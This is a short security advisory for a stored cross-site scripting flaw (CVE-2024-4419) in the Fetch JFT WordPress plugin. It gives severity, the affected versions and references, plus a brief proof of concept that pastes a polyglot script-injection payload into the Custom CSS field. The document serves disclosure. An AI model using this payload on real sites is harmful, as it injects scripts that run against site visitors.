Description
The Fetch JFT plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
Severity
4.4 (Medium) - CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
Affected Version
<= 1.8.3
PoC :
- Go To Fetch JFT Plugin Settings
- Put this payload on field Custom CSS
JavaScript://%0A/?’/\’/”/\”//*\\
/')/*\\74k
- Save Change
Reference
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3089669%40fetch-jft%2Ftrunk&old=3025839%40fetch-jft%2Ftrunk&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fetch-jft/fetch-jft-183-authenticated-administrator-stored-cross-site-scripting
- https://www.cve.org/CVERecord?id=CVE-2024-4419